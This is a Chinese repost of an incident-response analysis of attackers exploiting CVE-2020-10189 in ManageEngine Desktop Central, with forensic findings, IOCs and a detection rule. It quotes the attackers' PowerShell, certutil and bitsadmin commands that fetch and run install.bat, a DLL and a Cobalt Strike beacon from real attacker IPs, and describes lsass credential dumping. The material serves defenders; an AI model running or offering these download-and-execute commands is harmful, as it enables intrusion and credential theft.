安基網 首頁 資訊 安全報 查看內容

CVE-2020-10189攻擊案例分析

2020-3-31 13:02| 投稿: xiaotiger |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: 最近,Recon應急響應小組處理了一起涉及CVE-2020-10189影響的ManageEngine Desktop Central服務器入侵案例。Zoho ManageEngine Desktop Central 10軟件近期被曝出存在遠程代碼執行,因為FileStorage類中的getChartImage會對不安全的數據進行了反序列化處理。這與CewolfServl ...

轉載:nosec 作者:iso60001

最近,Recon應急響應小組處理了一起涉及CVE-2020-10189影響的ManageEngine Desktop Central服務器入侵案例。

Zoho ManageEngine Desktop Central 10軟件近期被曝出存在遠程代碼執行,因為FileStorage類中的getChartImage會對不安全的數據進行了反序列化處理。這與CewolfServlet和MDMLogUploaderServlet等servlet相關。

https://nvd.nist.gov/vuln/detail/CVE-2020-10189#vulnCurrentDescriptionTitle

Twitter上披露的遠程代碼執行

在我們研究Desktop Central漏洞的過程中,于Twitter上找到了一篇安全研究人員發布的帖子,他在2020年3月5日公布了Desktop Central的RCE。

而對CVE-2020-10189的研究還表明,目前可以在Shodan上搜索到有缺陷的Desktop Central服務器。

最初的攻擊手法是基于一個可疑的PowerShell下載操作,會從某個IP下載后續需要的惡意軟件install.bat和storesyncsvc.dll,放置在 C:WindowsTemp文件夾,然后立即執行install.bat。

cmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/install.bat','C:WindowsTempinstall.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/storesyncsvc.dll','C:WindowsTempstoresyncsvc.dll')&C:WindowsTempinstall.bat

install.bat腳本將把storesyncsvc.dll作為服務安裝在系統上。

可以預見,在PowerShell命令運行后的幾秒鐘內,一個新服務出現,名為StorSyncSvc,全稱是Storage Sync Service。

OSINT很快確認storesyncsvc.dll也出現在其他被攻擊的機器中。VirusTotal的結果表明,一些防病毒引擎已經將storesyncsvc.dll歸類為惡意軟件。

https://www.virustotal.com/gui/file/f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c/details

利用過程跟蹤去識別攻擊痕跡

從上述信息我們知道,這個RCE是在2020年3月5日通過Twitter公開的,而應急響應團隊在幾天前就已經有了一個關于攻擊者是利用Zoho ManageEngine Desktop Central中的漏洞進行滲透測試的理論。

對Sysmon進程創建事件的檢查表明,C:ManageEngineDesktopCentral_Serverjrebinjava.exe是負責執行PowerShell下載命令的進程。

查看內存中的進程,還可觀察到Desktop Central 的java.exe應用、cmd.exe和2.exe之間的緊密關系。

利用文件系統構件去識別攻擊痕跡

為了進一步驗證得出的理論,我們將從受影響的Desktop Central服務中收集的證據與已發布的POC進行比較,確定攻擊者可能利用了CVE-2020-10189漏洞在有缺陷的系統上運行了惡意代碼。

通過對文件系統時間線的分析,我們確定系統上可能發生了一次遍歷文件寫操作,涉及文件_chart和logger.zip。

這些文件名也在@Steventseeley發布的POC中被引用(https://srcincite.io/pocs/src-2020-0011.py.txt)。

系統中的payload

隨后在進程創建日志中可看到cmd.exe和certutil.exe命令用于下載和執行2.exe。而進一步的分析表明,2.exe極有可能來自流行的后滲透工具Cobalt Strike。

cmd /c certutil -urlcache -split -f http://91.208.184.78/2.exe && 2.exe

OSINT也表示2.exe已經被VirusTotal上的幾個防病毒引擎識別為惡意軟件:

https://www.virustotal.com/gui/file/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/details

通過app.any.run沙箱和對惡意軟件的內存分析,進一步證實了2.exe是一個和Cobalt Strike Beacon有關的payload。

https://any.run/report/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/e65dd4ff-60c6-49a4-8e6d-94c6c80a74b6

YARA分析

我們對惡意軟件2.exe使用的所有內存段執行了yara掃描,其結果進一步把2.exe和Cobalt Strike beacon綁定到一起。

通過Volatility的malfind插件,我們在內存部分發現了幾個隱藏的代碼注入的跡象。于是我們又進行了一次yara掃描,這次是針對malfind導出的內存段,結果又大大增加了Cobalt Strike beacon的嫌疑。

最后,我們檢查malfind的輸出以尋找代碼注入的證據,并很快在svchost.exe中識別出可疑的內存部分。然后又在另一位研究人員的幫助下,找到了將代碼注入svchost.exe的區域。


參考

在后續的攻擊活動中,我們觀察到惡意的Bitsadmin命令,其中包含從可惡意IP的12345端口12345下載install.bat。

而且我們的分析人員觀察到,Desktop Central服務器中運行的bitsadmin命令和PowerShell下載命令涉及的IP地址、端口和install.bat文件都一樣。

cmd /c bitsadmin /transfer bbbb http://66.42.98.220:12345/test/install.bat C:UsersPublicinstall.bat

訪問憑據

我們還發現了針對服務器憑據的惡意活動。攻擊者使用了一種常見的憑據轉儲技術,使用惡意進程(SourceImage)訪問另一個進程(TargetImage)。而最常被針對的是lsass.exe,因為它通常包含帳戶憑據等敏感信息。

而在目標機器上,我們發現了SourceImage 2.exe訪問TargetImagelsass.exe。Cobalt Strike Beacon包含類似于Mimikatz的本地憑證轉儲功能,唯一的條件是攻擊者必須擁有SYSTEM權限。而以下系統事件也證明了這一點。

用于處理類似入侵的IR團隊的工具

在分析此次入侵事件的時候,我們向Eric Zimmerman的KAPE工具添加了一些收集目標,以便將相關日志添加到對應成果中。

針對相關日志的使用示例如下:

kape.exe --tsource C: --tdest c:temptout --tflush --target ManageEngineLogs

IOCs

Storesyncsvc.dll
MD5: 5909983db4d9023e4098e56361c96a6f
SHA256: f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c

Install.bat
MD5: 7966c2c546b71e800397a67f942858d0
SHA256: de9ef08a148305963accb8a64eb22117916aa42ab0eddf60ccb8850468a194fc

2.exe
MD5: 3e856162c36b532925c8226b4ed3481c
SHA256: d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309

66[.]42[.]98[.]220

91[.]208[.]184[.]78

74[.]82[.]201[.]8

探測

Sigma項目的Florian Roth創建了一個簽名來檢測攻擊者使用的一些技術:

https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_exploit_cve_2020_10189.yml

我們通過分析也發現,基于進程創建日志中的命令行行為進行檢測是很有價值的。

ParentImage | endswith: 
'DesktopCentral_Serverjrebinjava.exe'
CommandLine | contains:
'*powershell*'
'*certutil*'
'*bitsadmin*'

感謝你的閱讀!

本文由白帽匯整理并翻譯,不代表白帽匯任何觀點和立場
來源:https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/


小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.toutiao.com/i6809939750246416904/

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


鮮花

握手

雷人

路過

雞蛋

相關閱讀

最新評論

 最新
返回頂部
洗衣店赚钱联系澳洁 黑龙江22选5开奖走势图 彩票广西11选5 上海投资理财平台 刘伯温四肖选一2020年版 新上市股票几天才能买 江苏快3基本走走势图 股票在底部放量下跌 上证指数可以炒吗 聚众赌博行政拘留多少天 福建快3网上买